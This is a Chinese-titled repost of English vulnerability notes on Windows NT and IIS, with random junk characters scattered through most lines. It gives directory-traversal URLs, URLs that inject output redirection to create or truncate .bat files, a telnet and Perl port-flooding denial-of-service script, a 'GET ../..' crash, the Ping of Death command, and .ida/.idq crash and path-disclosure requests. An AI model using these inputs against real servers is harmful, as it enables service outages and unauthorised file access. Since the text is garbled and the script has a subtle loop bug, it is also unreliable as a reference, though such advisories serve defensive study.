NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
# a- T8 o- L3 K/ q5 J8 GA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
- y' e* w1 F! c$ [' o" m
受影响系统:4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
% I. B3 \9 x, w6 C$ f. B
2 Y6 p7 x& R5 v2 z7 J1 c4 f4 lIf the file 'target.bat' exists, the file will be truncated.


/ i" K4 p% Z: ^. ?A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

----------------------------------------------------------------------
" ]( z3 R/ I8 I3 u7 d- c
受影响系统:3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
/ }' T  F. J0 e2 u  O6 ?
The following steps;
; `( r: h" Z* G7 n3 U1 O
2 V3 I' h& U  nTelnet to an NT 4.0 system on port 135
: k6 U- y. q3 ~Type about 10 characters followed by a <CR>
Exit Telnet
9 R3 W2 X* {1 f- U. ^# p( a  Vresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
- y& ?0 s4 V$ z2 g
; e* o* ]- u1 ?: A6 xWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

, F2 Q; t6 }5 i7 g+ pThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
0 ^0 S: p2 D3 Q+ j7 |; l( s
+ v$ A8 ~* [! j- v% L. w6 o  SIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

: k8 p* n  P' zThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
, w8 d& f; L" R7 M/ O
/*begin poke code*/

* b4 K2 j5 q, H/ G9 u" |) wuse Socket;
use FileHandle;
) C" N0 i0 a/ N, |0 B* G( Prequire "chat2.pl";
; l( G2 h# W& e+ b0 j/ |8 ]4 p# C
6 w0 J5 A+ C0 Q8 E$systemname = $ARGV[0] && shift;
* ~' v3 r7 o# ^$ W! Y, |
$verbose = 1; # tell me what you're hitting
; ^: J1 X$ o# G9 m$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
) J6 ^. D7 f$ `, A6 ?{

" U0 V+ c' I$ N8 d
3 d* n" V* Z- Q' {$ a6 {4 ]8 g% Cif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
  s1 L8 b. R5 N. e& ]}
2 ^6 ], C' W# a$ c- F1 J0 t2 @$fh = chat::open_port($systemname, $port);
# X3 t3 i3 H( P) I2 @chat::print ($fh,"This is about ten characters or more");
5 k) W, r2 T" p4 c! vif ($verbose) {
) U9 A/ w* m1 s# cprint "Trying port: $port\n";
9 h% C. x; P- z/ w}
0 I+ w3 P/ c" c9 G5 X* cchat::close($fh);

}


/*end poke code*/

; a0 x3 ~4 w* s& I( s0 Y+ c: FSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
5 `! b5 y( g# }; c) c! \5 w
9 m* S/ x- C- c; r# o! ?; U' S--------------------------------------------------------------------------------

, R5 s, x" k  h. d受影响系统:4.0
6 |/ h1 E+ n8 K) @2 Z9 U3 E) [Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
1 P/ b2 q5 A0 A1 m7 a
6 x8 x4 j" G: e--------------------------------------------------------------------------------
4 y1 r7 o. w0 G, o$ w0 L# k
2 g& f4 Q1 r0 S+ _受影响系统:3.51,4.0
  f6 O8 p, w+ wLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

4 B6 F7 c; v5 h6 t3 _! BSTOP: 0X0000001E
/ e/ V  H' C- m: s7 K" SKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
& z% q: S" m9 S' }$ K
-OR-
* [! E$ E. r# q1 K8 U3 V
STOP: 0x0000000A
  p6 C" V: q( J- l+ _IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

: r0 V6 R1 o. B- j; v: d--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
) J" e$ T" D2 Y: Z6 R% m6 l
--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server